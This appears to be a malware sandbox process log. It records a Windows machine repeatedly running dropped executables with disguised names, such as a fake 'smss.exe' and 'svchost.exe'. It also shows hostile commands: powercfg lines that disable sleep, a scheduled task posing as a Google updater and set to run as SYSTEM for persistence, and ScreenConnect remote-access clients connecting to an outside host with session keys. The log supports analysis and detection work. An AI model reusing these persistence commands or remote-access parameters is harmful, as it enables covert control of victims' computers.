C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\svchost.exe
1⤵
PID:3640
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  C:\Users\Admin\AppData\Local\Temp\svchost.exe
  2⤵
  PID:10492
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10492 -s 204
    3⤵
    - Program crash
    PID:12380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8196
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:10988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9852
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:4696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 9068 -ip 9068
1⤵
PID:10336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8452
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:10588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9420
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9464
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:4216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8356
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:10524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:8372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:10392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:10368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:10728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:10712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:12532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:12716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 13008 -ip 13008
1⤵
PID:13228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 13156 -ip 13156
1⤵
PID:9644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
1⤵
PID:13964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 12664 -ip 12664
1⤵
PID:8788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 14060 -ip 14060
1⤵
PID:9512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:8800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:5560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:7292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:12680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10588 -ip 10588
1⤵
PID:13268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:14064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:12284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:10324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:10168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:10164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10492 -ip 10492
1⤵
PID:10872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:12780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12700

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:13532

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
- Power Settings
PID:12452
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3140
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:14756
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:9208
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:14688

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:12636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:10436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:6116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:10900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:12868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13436

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\flaevwjwirpw.xml"
1⤵
- Scheduled Task/Job: Scheduled Task
PID:13756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13520

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:14976

C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=37.221.64.46&p=8041&s=3bb46893-9f25-4c70-bcb4-07451b3ea3ea&k=BgIAAACkAABSU0ExAAgAAAEAAQBtRcOmkrgNYslRocOkTkuTyihOpi8jiGU066NYR9jBDXkHxmSQ2YVUm3s8%2fooJYnEhSV7fUNG1B5eE%2bEBaTsdMjuSy6wM5sWHiNov0I%2fCi2R8idtf7h0sRNyUXYU5mv3W%2f%2bAAUF5FVSqznlNh79hYpQ5ibv2AEsvG1v7zIzpVIe9GJKEaCyiMYnNwSkNrJyk7EHRdZqqtnkfYNP7V5qS%2f5EGwD4G1QOOnZh31YJbjAYbQ8GP%2b16XpkKKcCdOuQgGXJcCyDfk7uTR3jzS8ZKuveOcMCrYggcWYA0u%2bjDf3hxmbOoHDVTNrhlpt3R6xZaEcGEohbZJ69mglDgpaukS6e&r=&i=threenew" "1"
1⤵
PID:13056
- C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe" "RunRole" "e9987a4b-55b2-4d6b-bcb3-36a57e08912d" "User"
  2⤵
  PID:14728
- C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe" "RunRole" "e8e2fc38-2b09-4c0e-932f-f59e0029478a" "System"
  2⤵
  PID:8376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:10268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:1500

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:380

C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=37.221.64.46&p=8041&s=55eaee0a-3347-421f-9eb9-edebabd8fc93&k=BgIAAACkAABSU0ExAAgAAAEAAQBtRcOmkrgNYslRocOkTkuTyihOpi8jiGU066NYR9jBDXkHxmSQ2YVUm3s8%2fooJYnEhSV7fUNG1B5eE%2bEBaTsdMjuSy6wM5sWHiNov0I%2fCi2R8idtf7h0sRNyUXYU5mv3W%2f%2bAAUF5FVSqznlNh79hYpQ5ibv2AEsvG1v7zIzpVIe9GJKEaCyiMYnNwSkNrJyk7EHRdZqqtnkfYNP7V5qS%2f5EGwD4G1QOOnZh31YJbjAYbQ8GP%2b16XpkKKcCdOuQgGXJcCyDfk7uTR3jzS8ZKuveOcMCrYggcWYA0u%2bjDf3hxmbOoHDVTNrhlpt3R6xZaEcGEohbZJ69mglDgpaukS6e&r=&i=thomas" "1"
1⤵
PID:10088
- C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe" "RunRole" "eae2784b-1c5f-4034-b2f5-c021c9fa9ecb" "User"
  2⤵
  PID:10584
- C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe" "RunRole" "38ce0d58-ff4d-4d72-b7c7-8181c53977b9" "System"
  2⤵
  PID:6428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:8932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:6052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:5700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:2740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:11828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:15348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:5428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:12380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:14352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:14372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:14428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:14444

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:14892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:14876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:14868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Userdata\Userdata.exe"
1⤵
PID:15188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:14780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:14216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:2892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:7560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:8088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:10016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 9108 -ip 9108
1⤵
PID:10704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:7568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:11680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:8148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:12912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:9900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:13788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:13836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
1⤵
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:9860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:14628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:3512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:3480

C:\Windows\System32\cmd.exe
